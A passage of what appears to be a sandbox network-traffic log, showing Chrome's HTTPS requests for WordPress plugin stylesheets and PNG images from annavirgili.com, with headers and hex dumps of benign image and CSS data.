                                                                                                          2024-12-12 11:58:20 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0c a4 00 00 05 6c 08 06 00 00 00 bc 2c a4 f8 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e5 08 0a 0e 20 20 71 e4 a2 54 00 00 20 00 49 44 41 54 78 da ec dd d1 71 2c 47 96 1e e0 93 13 7a 07 3c 00 d6 02 b4 07 c8 b5 60 e8 c1 dc b1 40 94 05 a2 2c d0 8c 05 e2 58 20 ae 05 4a 78 00 58 20 c0 82 45 5b 70 f4 30 cd d8 11 77 48 a2 b3 ab 3b b3 aa be 2f 62 63 23 86 c8 8b ec 73 4e 65 bf d4 8f 2c 99 19 00 00 00 00 00 00 00 00 00 00 00 00 f0 55 7f 50 02 00 00 00 00 00 00 00 00 00 00 00 00 ce 21 90 02 00 00 00 00 00 00 00 00 00 00 00 c0 59 04 52 00 00 00 00 00 00 00 00 00 00 00 00 38 8b 40 0a 00 00 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: PNGIHDRl,bKGDpHYs.#.#x?vtIME qT IDATxq,Gz<`@,X JxX E[p0wH;/bc#sNe,UP!YR8@
                                                                                                          2024-12-12 11:58:20 UTC16384INData Raw: ae 4e 20 05 00 00 00 00 60 72 a5 94 db 88 b8 eb 28 fd c8 4c b7 60 f0 25 4f 5a 30 5c 9d 64 1d cd 56 2c 3d 0b bd b5 de 11 00 00 00 00 00 74 13 48 01 00 00 00 00 98 5f ed ac f3 a1 31 5f d3 b4 60 d9 e7 db 2c 6c cf 5d 29 e5 fe ca 73 64 df 01 00 00 00 00 e8 26 90 02 00 00 00 00 30 bf da 59 d7 b4 8e af 10 5a 1a ef 30 c3 22 32 f3 3d 22 de df c1 bb 59 00 00 20 00 49 44 41 54 6c c7 7a e7 fd 09 b7 68 bd 65 e6 ab 96 03 00 00 00 00 d0 4b 20 05 00 00 00 00 60 7e b5 b3 ae 69 1d 66 64 7a a7 dc 8a 61 1e b6 a7 27 a0 e4 1d 01 00 00 00 00 c0 10 02 29 00 00 00 00 00 f3 7b e8 29 ca cc a6 75 7c 65 46 de 23 e2 45 27 86 ab 93 ac c3 99 b1 e6 2c f4 ce 8f 1b 92 00 00 00 00 00 38 89 40 0a 00 00 00 00 c0 c4 4a 29 b5 b3 f4 49 f7 f8 46 3e 4a 1f ef 60 16 38 7a 28 a5 dc 7e b2 a6 f7 3d d1
                                                                                                          Data Ascii: N `r(L`%OZ0\dV,=tH_1_`,l])sd&0YZ0"2="Y IDATlzheK `~ifdza'){)u|eF#E',8@J)IF>J`8z(~=
                                                                                                          2024-12-12 11:58:20 UTC16384INData Raw: ab 0a a0 09 57 d1 df 06 e5 95 71 1b cf 69 24 18 25 42 30 0a 75 e6 e5 82 52 f8 6a a3 0a 00 60 6f 66 b5 b6 fa ca be ab 5f 52 4a db b1 f6 75 a7 94 ce 52 4a db 88 f8 e5 3b ff c9 cf e5 7e 26 45 40 0a b3 55 16 eb 4e 1b bd 7d 1b d4 e1 5f 7f 13 bd 2e 30 fd 21 08 8d 16 27 09 65 53 16 ed 4c 8e 5a 77 14 16 99 69 b3 bf b4 01 8e 39 5a 36 7a df a7 36 fd 00 2f 58 75 50 86 33 cd c8 94 94 d3 cd 6b 71 3a ca f4 6c 55 01 cd 4c d6 58 00 00 20 00 49 44 41 54 30 b6 b2 41 f9 a2 f4 fb bd 58 44 c4 a0 75 f9 cb b8 a9 95 60 94 9f 05 a3 50 b9 cf 5f 1e a0 cf ff a4 f6 61 16 ee dc 2f 80 be e6 95 7d 57 47 11 f1 3f 29 a5 4d 4a 69 f9 a3 49 75 53 4a 3f 95 3f 77 17 11 ff 53 ae f7 bd 79 d5 24 d7 05 04 a4 30 67 ab 86 ef fd dc 46 18 f8 a7 97 fd 63 44 ac 3b 2e e2 3a a5 64 31 8b 9a bf 21 0b 12 f3
                                                                                                          Data Ascii: Wqi$%B0uRj`of_RJuRJ;~&E@UN}_.0!'eSLZwi9Z6z6/XuP3kq:lULX IDAT0AXDu`P_a/}WG?)MJiIuSJ??wSy$0gFcD;.:d1!
                                                                                                          2024-12-12 11:58:20 UTC16384INData Raw: 66 05 00 00 a0 86 7f 53 05 b3 67 53 01 ad 58 84 45 60 98 a5 9c f3 26 22 7e ee b8 88 43 4a c9 26 6b 60 0c 17 b1 cb be df a3 93 94 d2 a0 89 e9 41 09 b6 3d 52 13 34 62 99 52 fa 49 35 00 af cc db 87 46 c7 a1 2d ae 37 d6 b8 df 2f 4e c3 02 60 a4 31 c1 75 44 dc 36 5c 84 cb 92 cc 11 a2 04 2d 77 b7 d6 5a 4e da 06 ea ba 57 05 00 00 cc 8d 80 94 19 2b 8b 0d b2 60 d0 12 01 54 30 53 65 73 cb 4d a7 c5 5b 44 c4 da 46 3f 60 84 be f2 31 76 41 29 4f 9d 16 f1 32 a5 64 3c 88 79 0d ec 7f ac 7a a0 0d d7 f0 00 00 20 00 49 44 41 54 a1 1a 80 37 18 bc 97 9b bd df 6b 8f 2f 00 23 6a 7d 6d ea ba 9c 48 06 11 7d 9e 92 22 41 1a d4 f7 a8 0a 00 00 98 1b 01 29 f3 66 13 0c ad 39 92 b5 05 e6 2b e7 bc 8c 7e 33 ca 1c 45 c4 5a 2b 03 23 f4 95 77 d1 f7 a9 72 7f 18 0f d2 b2 b2 a9 e5 54 4d d0 18 eb
                                                                                                          Data Ascii: fSgSXE`&"~CJ&k`A=R4bRI5F-7/N`1uD6\-wZNW+`T0SesM[DF?`1vA)O2d<yz IDAT7k/#j}mH}"A)f9+~3EZ+#wrTM
                                                                                                          2024-12-12 11:58:20 UTC14790INData Raw: 00 00 00 00 00 00 00 00 00 00 80 9d 08 48 01 00 00 00 00 00 00 00 00 00 00 00 60 27 02 52 00 00 00 00 00 00 00 00 00 00 00 00 d8 89 80 14 00 00 00 00 00 00 00 00 00 00 00 00 76 22 20 05 00 00 00 00 00 00 00 00 00 00 00 80 9d 08 48 01 00 00 00 00 00 00 00 00 00 00 00 60 27 02 52 00 00 00 00 00 00 00 00 00 00 00 00 d8 89 80 14 00 00 00 00 00 00 00 00 00 00 00 00 76 22 20 05 00 00 00 00 00 00 00 00 00 00 00 80 9d 08 48 01 00 00 00 00 00 00 00 00 00 00 00 60 27 02 52 00 00 00 00 00 00 00 00 00 00 00 00 d8 89 80 14 00 00 00 00 00 00 00 00 00 00 00 e5 7a d4 6c 00 00 20 00 49 44 41 54 00 76 22 20 05 00 00 00 00 00 00 00 00 00 00 00 80 9d 08 48 01 00 00 00 00 00 00 00 00 00 00 00 60 27 02 52 00 00 00 00 00 00 00 00 00 00 00 00 d8 89 80 14 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: H`'Rv" H`'Rv" H`'Rzl IDATv" H`'R


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          57192.168.2.2449841147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:19 UTC687OUTGET /wp-content/plugins/woocommerce-products-filter/js/tooltip/css/tooltipster.bundle.min.css?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:20 UTC267INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:20 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 6495
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:20 UTC6495INData Raw: 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 66 61 6c 6c 2c 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 67 72 6f 77 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 73 68 6f 77 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 37 35 2c 2e 38 38 35 2c 2e 33 32 2c 31 29 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 37 35 2c 2e 38 38 35 2c 2e 33 32 2c 31 2e 31 35 29 3b 2d 6d 73 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 37 35 2c 2e 38 38 35 2c 2e 33 32 2c 31 2e 31 35 29 3b 2d 6f 2d 74 72 61 6e 73
                                                                                                          Data Ascii: .tooltipster-fall,.tooltipster-grow.tooltipster-show{-webkit-transition-timing-function:cubic-bezier(.175,.885,.32,1);-moz-transition-timing-function:cubic-bezier(.175,.885,.32,1.15);-ms-transition-timing-function:cubic-bezier(.175,.885,.32,1.15);-o-trans


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          58192.168.2.2449842147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:20 UTC472OUTGET /wp-content/uploads/2022/10/Progetto-senza-titolo-2024-09-04T092536.181.png HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:20 UTC247INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:20 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 04 Sep 2024 07:30:46 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 336687
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: image/png
                                                                                                          2024-12-12 11:58:20 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 02 00 00 02 94 08 03 00 00 00 a9 11 6a e3 00 00 05 01 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 27 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 27 3e 0a 20 20 20 20 20 20 20 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e 74 61 78 2d 6e 73 23 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 20 72 64 66 3a 61 62 6f 75 74 3d 27 27 0a 20 20 20 20 20 20 20 20 78 6d 6c 6e 73 3a 64 63 3d 27 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 65 6c 65 6d 65
                                                                                                          Data Ascii: PNGIHDRjiTXtXML:com.adobe.xmp<x:xmpmeta xmlns:x='adobe:ns:meta/'> <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'> <rdf:Description rdf:about='' xmlns:dc='http://purl.org/dc/eleme
                                                                                                          2024-12-12 11:58:20 UTC16384INData Raw: c4 c4 4e 61 28 ee f0 f9 02 3e 2e 2a 78 ea 05 a5 c0 82 11 42 02 b7 ab 39 7c 62 6e 75 3c 37 07 90 d4 01 e3 e9 3e 41 a2 a6 92 88 64 71 51 d1 2a c5 3d 3d 64 49 a0 12 01 06 a5 2c e0 e9 60 97 b8 5a bb d8 e9 b3 0b 07 37 bf fe b1 67 6b 39 ce 10 30 8f 7e 40 4f cb d4 74 3c 8c 62 20 11 f1 57 14 e0 51 e9 02 18 88 45 82 6c 18 4a d7 42 50 2e d8 c9 66 21 d2 f6 10 e4 01 0c 01 b7 ef df 26 04 60 ec 09 06 bb 27 28 ba c5 41 7f e4 54 55 45 e9 3e be cc e6 bd 30 fe 35 d0 49 dd e0 b5 b5 b5 d9 06 50 2b 10 fd 41 14 04 c4 9f 88 f0 2f e8 9b e8 b0 96 ef db b3 b7 14 6a 61 4c 0e 1b 43 21 9c f4 76 c2 80 10 a1 c0 51 a3 e1 23 4b 79 15 a5 02 d5 16 cc 07 11 0d 40 51 d0 88 d6 21 e6 04 09 65 88 06 0c f0 12 c4 54 2a 15 81 71 90 6a db e1 1e ed 7b 54 03 33 7e bf db cd 0e a6 35 02 26 f5 cf 57 2e
                                                                                                          Data Ascii: Na(>.*xB9|bnu<7>AdqQ*==dI,`Z7gk90~@Ot<b WQElJBP.f!&`'(ATUE>05IP+A/jaLC!vQ#Ky@Q!eT*qj{T3~5&W.
                                                                                                          2024-12-12 11:58:20 UTC16384INData Raw: 7f ae 14 ac bc 04 cc 4a 1f 8e 0d 10 11 82 76 ee 05 94 89 f5 3f 27 47 83 97 f9 84 3c d0 c2 a9 e2 15 f4 61 01 73 c0 1e 91 5d 36 15 b0 70 e2 98 e5 04 3d 6a a1 07 aa ae 71 94 0b 23 80 9a 1a 6f 0d f6 5a dd 26 18 5f bb 4d 50 ad f2 56 10 91 ff 5a 9e 02 9a 8d f4 2c 4e 3d 8e bf a1 d2 c0 8f 4a 83 c9 dc 60 e1 3e c7 bd 04 43 c0 c6 ab e5 a7 83 1d b8 34 91 ea 2d cf e4 98 01 b4 c9 14 60 1c f7 bf e0 02 e9 7e c0 38 83 80 58 19 ba 30 b7 fa 0b 42 00 82 80 a1 37 af a9 0c 48 7e dc 75 32 0a 75 30 9b 8c 5c 15 df d8 87 b7 be 3e 78 87 0a 53 e1 41 f5 9b 8c 02 8a 6f 08 47 09 80 05 b0 3a 98 31 40 40 c0 03 d1 13 c4 64 50 58 09 8a 70 82 81 1e 44 95 0c 0c 80 c8 70 ea 18 56 1d e1 46 c6 79 05 bc 52 fc d9 5f 7f fb 2e 8c 02 76 16 e5 40 c0 be 03 7b f6 ef 82 30 a8 50 40 c0 de bd 06 c8 80 3b
                                                                                                          Data Ascii: Jv?'G<as]6p=jq#oZ&_MPVZ,N=J`>C4-`~8X0B7H~u2u0\>xSAoG:1@@dPXpDpVFyR_.v@{0P@;
                                                                                                          2024-12-12 11:58:21 UTC16384INData Raw: 7a 45 f4 a7 40 80 54 22 bc 0f 6b 3b 08 fb 75 b9 43 1d e1 bf a4 fa 52 89 89 89 44 38 9e ec 31 d9 c3 f1 70 20 e2 72 d3 f3 fe 28 74 7d 50 05 10 c0 70 74 c0 be a1 d8 50 8e 06 c0 3c 90 3d 42 fc bc f1 2f f2 83 b1 16 04 93 20 a8 04 1d 2e aa 25 5c 7e 37 e1 89 d5 1e 80 20 d8 ef 0b 59 a9 f0 b0 4b b6 7e 1f 01 80 51 92 6c 46 26 01 e0 0c 68 36 7b 3d 46 73 3b db 7e 9b eb a9 d0 1f 0c 0e 1a 83 4c dc b3 a1 87 d8 08 e6 0e a0 de 4c 35 be 00 00 91 7e 0b 23 a0 f6 5d 7b 0f b7 ec 16 01 38 7a 71 f8 79 2f a8 de 21 b5 62 4f a8 d3 06 e2 8f 4e 7b 90 4a 08 9b dd df d0 d0 d4 20 49 1d a6 26 87 c9 de 61 39 aa 62 00 f8 53 de e4 cd 39 7b 9d 56 c6 02 aa dd 80 63 32 1f 30 7c 7d f9 e7 bf 82 2a e0 dc fb 6b 2f 20 0d 9c e7 81 c0 5c fa 56 fc 49 c1 6e c0 f9 f3 42 16 74 7a 4c e4 0f 01 02 d0 0a 80
                                                                                                          Data Ascii: zE@T"k;uCRD81p r(t}PptP<=B/ .%\~7 YK~QlF&h6{=Fs;~LL5~#]{8zqy/!bON{J I&a9bS9{Vc20|}*k/ \VInBtzL
                                                                                                          2024-12-12 11:58:21 UTC16384INData Raw: 94 c3 55 ca dc 42 05 eb 00 f6 86 5f f6 26 19 a1 af 7c 1c cc 5f ed da 3f b2 d4 2a 40 37 2b 94 ad e3 08 5b 17 96 a7 27 00 02 70 99 99 cd 00 04 4c 5e 88 67 16 76 95 97 57 50 b1 50 79 be 32 b4 b8 3b e0 f5 92 00 dd 5b a0 2e 2e a0 24 0b 58 ef 20 2c 09 01 18 1f 2a 47 12 00 01 c9 91 b7 6f 9c 4b 63 11 a8 9d 41 00 9c d7 03 23 7f 57 fd 92 3f 81 91 df 1e 74 13 c9 a2 0b 13 fe 10 01 64 d6 22 0e 1f a7 63 00 0a 70 c6 b1 43 dc 16 88 4a 00 14 aa 2c a3 9c d8 8f 5a 5f 31 60 c7 f1 5f c2 2b 9e c7 85 33 39 40 28 10 82 8b 5f c2 31 40 a6 ca 42 1c 11 70 0f 48 2f 81 b4 04 b4 38 9c 4e 13 d2 7f cc 03 71 b7 90 1c 98 ca 01 31 11 a4 dd dd 84 08 20 e0 2d ef 45 16 d0 17 74 36 9a 50 0c dc ac d5 03 53 28 78 ce 0c c0 35 40 fc 0d d0 98 5f fd f3 a6 10 42 0a f8 ff 73 3f d3 ff 18 79 69 28 83 80
                                                                                                          Data Ascii: UB_&|_?*@7+['pL^gvWPPy2;[..$X ,*GoKcA#W?td"cpCJ,Z_1`_+39@(_1@BpH/8Nq1 -Et6PS(x5@_Bs?yi(
                                                                                                          2024-12-12 11:58:21 UTC16384INData Raw: 0c f2 de 4e 74 12 8d c5 78 da 43 80 ce c0 88 00 d8 50 60 07 66 c0 0b 7a 9b ce 46 32 20 71 7f 84 80 91 36 dc 15 0c b7 5f b5 ba d9 72 00 2c 02 72 6e 69 1a 90 7a 81 a8 1a 88 66 a1 1c 12 79 72 f2 3d 28 f7 ff 8a 1e 81 92 d8 87 7b eb 71 ed af 19 b8 bd 43 43 78 81 fd fe 1a aa 22 6a d0 56 f8 30 e2 80 3f c8 bd 8b 29 81 d9 af 0d 73 f0 17 9a b9 a8 33 90 4a 35 27 6b 9b 4d a9 9c c7 64 4a 79 3c a9 94 4d 53 1d d5 3a 3d bd 09 9f a9 59 c0 fe 24 64 2d bc c5 22 f0 fa a6 a0 00 ff 61 a6 a6 8e 6e 34 12 bd 8f 34 60 6a 0a 1b aa ad 78 fa 93 ed 35 44 9b 08 04 92 19 7e 49 87 90 48 03 44 0c 90 ea 82 94 0f 0c b3 14 40 64 00 e3 a8 04 00 01 98 47 3d 60 6c f5 bf d3 4f 17 96 96 ce 24 7a ba 2e 5d ba f4 c9 9d e5 ef d6 3e a4 21 a2 71 4a 07 28 a2 c7 91 e9 33 42 70 45 64 03 a7 db 5a dd 62 f6
                                                                                                          Data Ascii: NtxCP`fzF2 q6_r,rnizfyr=({qCCx"jV0?)s3J5'kMdJy<MS:=Y$d-"an44`jx5D~IHD@dG=`lO$z.]>!qJ(3BpEdZb
                                                                                                          2024-12-12 11:58:21 UTC16384INData Raw: 84 0e ca b7 5f 7c b4 36 bb 34 bb de 54 e1 aa db ff a4 1c 48 b2 8c a0 ab 2a 3c 70 05 5d fa d8 a0 d1 4f 88 3a 8a d1 be 82 2b a8 c5 00 2e e2 3f ae 7b 8e ea f7 49 39 a0 df e8 65 0e f1 00 16 07 e0 d2 00 62 80 36 46 02 c7 89 93 68 33 d7 b9 b1 e1 f2 9e bb f4 e4 a7 07 2c 15 d3 24 c0 46 ff 60 dd 1c b0 be fe 80 28 a0 ee fb 2d 14 26 ea c0 06 44 0a 87 60 b3 30 44 f7 60 01 00 b9 40 4f 0f f5 01 49 41 04 00 3e c0 76 28 06 0c 2a aa f3 22 28 82 9c 50 05 c0 af 74 fa 61 45 00 2e 00 88 b0 18 d8 e6 ee 83 26 bf 0d 8b 01 bb 44 36 11 88 f5 80 3e cc 00 62 57 84 82 df c6 44 c0 42 91 b4 fe e3 3e 72 61 2b 21 9f 1d 9d cd 02 62 0f a0 11 cc 00 11 9b 98 4a 25 64 35 de 2e a1 93 5f 4a c5 4f 2b 88 10 fc 82 0a c3 01 9e 81 fc f0 40 56 15 9c 3d 67 cf 4a 89 f9 b9 c9 b9 c9 b0 94 9b 5f 9d 5b c8
                                                                                                          Data Ascii: _|64TH*<p]O:+.?{I9eb6Fh3,$F`(-&D`0D`@OIA>v(*"(PtaE.&D6>bWDB>ra+!bJ%d5._JO+@V=gJ_[
                                                                                                          2024-12-12 11:58:21 UTC16384INData Raw: 27 af a2 c5 9f ca c1 76 22 15 ec 4d f8 06 d1 eb ab e4 be 5f 2a 39 4b f8 12 3e a6 94 2a 9c 58 0b fb d2 b7 d4 3e b1 73 e7 ee dd e4 ba 6d db b6 4d 2f be d8 dd 4d c2 bf a9 69 10 a0 60 10 b8 c1 4b db 37 3d 51 19 17 90 13 e8 7c 20 ca 04 45 50 1a 8c 46 c9 5b a1 92 41 bb 3d 0c 23 ca 8a 4a 3d 85 b0 ba 18 0e 6f 7e f9 6c c0 5d 90 3b 3f d7 c8 05 58 45 c0 00 01 20 02 e4 21 b4 08 ae df 48 26 01 05 f0 d2 4b 30 20 79 6c 7c 7a 7a ba ad ed c8 89 56 47 cf df e7 fc 8f b2 ab 81 89 f2 3e e3 4e a1 53 e8 22 43 1b 84 2c 02 6b 10 98 e1 3e e0 9d f7 72 80 bd 0f 8e b3 c7 9d 43 cf 17 bd 88 1c 9c ef bd e7 71 57 6f 05 95 6e 13 b5 29 ae e5 24 42 b0 c7 30 d4 50 1c 28 ce c6 ce 49 4c 21 33 91 1c ac 49 23 1a 6c d3 35 59 36 17 3f b6 88 1f 4d 53 17 33 9b ae 7b 9e ff ff 7d df 7b 5f 40 e7 fe 09
                                                                                                          Data Ascii: 'v"M_*9K>*X>smM/Mi`K7=Q| EPF[A=#J=o~l];?XE !H&K0 yl|zzVG>NS"C,k>rCqWon)$B0P(IL!3I#l5Y6?MS3{}{_@
                                                                                                          2024-12-12 11:58:21 UTC16384INData Raw: 58 48 82 60 01 16 20 d3 00 54 de 68 f2 f3 0b e0 f4 47 0c 20 e1 4f 1e 45 88 01 6f ff f0 98 10 ad 21 80 5b 20 a3 00 e0 24 9c 69 1f aa 69 6f d1 68 b6 b8 94 91 4f d6 87 63 d1 8b dd ad 53 3a f0 cb 83 d3 76 cb be ef 25 cc 03 32 69 f4 17 c0 e6 64 fd 3e 4d 41 62 ed f3 a7 57 9e 3e fd f0 fc 8d e1 4f 67 2b 2b 9f fd 7d d7 f3 cb 89 64 a2 f0 37 85 a7 7f f9 cf ef be 79 37 a7 70 ee c4 e9 0f ae 7c 78 e3 b7 30 2a f8 f0 fe fd bb 77 09 04 2c 92 d0 cf 5b 9e 5a 5e aa 52 b8 fd 57 a7 14 01 5c fb cf e7 7c 29 10 54 2b 5c bf 79 ef 9f ba fc c8 95 40 d7 e6 e6 3f ad 07 40 af 8f bc 65 36 f3 1b f0 07 17 7a ca 4b 3e 71 d3 17 5b e6 8d 00 e0 40 20 c0 8d bd e4 05 6d e8 ab f7 62 22 40 50 60 79 4a 9a 9d ed 25 8c 7f fa a3 a1 17 d3 37 23 c8 02 22 18 ff a3 bc 25 f0 d1 eb 57 af 46 a7 6f 4e 2c ee
                                                                                                          Data Ascii: XH` ThG OEo![ $iiohOcS:v%2id>MAbW>Og++}d7y7p|x0*w,[Z^RW\|)T+\y@?@e6zK>q[@ mb"@P`yJ%7#"%WFoN,
                                                                                                          2024-12-12 11:58:21 UTC16384INData Raw: 85 7c 00 02 f6 7e 0c 02 12 71 e2 05 8a ab 5a 60 12 db 03 58 4b 47 57 9d cf e5 43 7b d0 70 67 6b 3b d6 b5 47 bb c3 89 b5 c2 ca 8b 82 e2 87 74 4d 12 b3 33 b5 fa e7 7c 7a 35 0f 51 16 58 00 5e 10 80 ac 1f c8 67 32 f9 7c 7e 35 2d 4b 0b b9 42 32 0b 6a 20 9d 4e 26 33 99 64 be b0 0a 79 3f 59 c8 e5 65 a4 fb 6e 51 0c 73 81 48 42 91 c2 0e c7 e8 e8 68 f7 a8 a3 75 c0 11 06 0a 90 4a 09 22 10 01 6e 69 c9 99 9a e0 78 1e 54 02 bc 9b a8 64 94 48 4c 89 f1 3c 17 0e 3b dd a4 0e 58 4a 76 f7 fe 9b b1 ab ed 69 eb 3c c3 d1 48 aa c5 88 8c 9a 30 70 aa f0 12 86 0f 23 b5 79 31 08 e7 50 e7 c5 3d a9 c1 c1 c4 04 1b 16 73 30 f8 b5 60 9b 90 e2 d8 44 5e 33 32 99 14 e1 b2 f8 a8 16 15 de 17 4b 51 83 50 96 51 a9 b2 10 7c d8 07 6b 20 3e 95 08 35 da 7e 40 94 6d bf 20 ea 97 49 bb ef e7 39 e7 f8
                                                                                                          Data Ascii: |~qZ`XKGWC{pgk;GtM3|z5QX^g2|~5-KB2j N&3dy?YenQsHBhuJ"nixTdHL<;XJvi<H0p#y1P=s0`D^32KQPQ|k >5~@m I9


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          59192.168.2.2449843147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:20 UTC728OUTGET /wp-content/plugins/woocommerce-products-filter/js/tooltip/css/plugins/tooltipster/sideTip/themes/tooltipster-sideTip-noir.min.css?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:21 UTC267INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:20 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1324
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:21 UTC1324INData Raw: 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 73 69 64 65 74 69 70 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 6e 6f 69 72 20 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 62 6f 78 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 7d 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 73 69 64 65 74 69 70 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 6e 6f 69 72 20 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 63 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 73 69 64 65 74 69 70 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 6e 6f 69 72 20 2e 74 6f 6f 6c 74 69 70 73 74 65 72 2d 61 72 72 6f 77 7b 68 65 69 67 68 74 3a 31 31 70 78 3b 6d 61 72 67 69 6e 2d
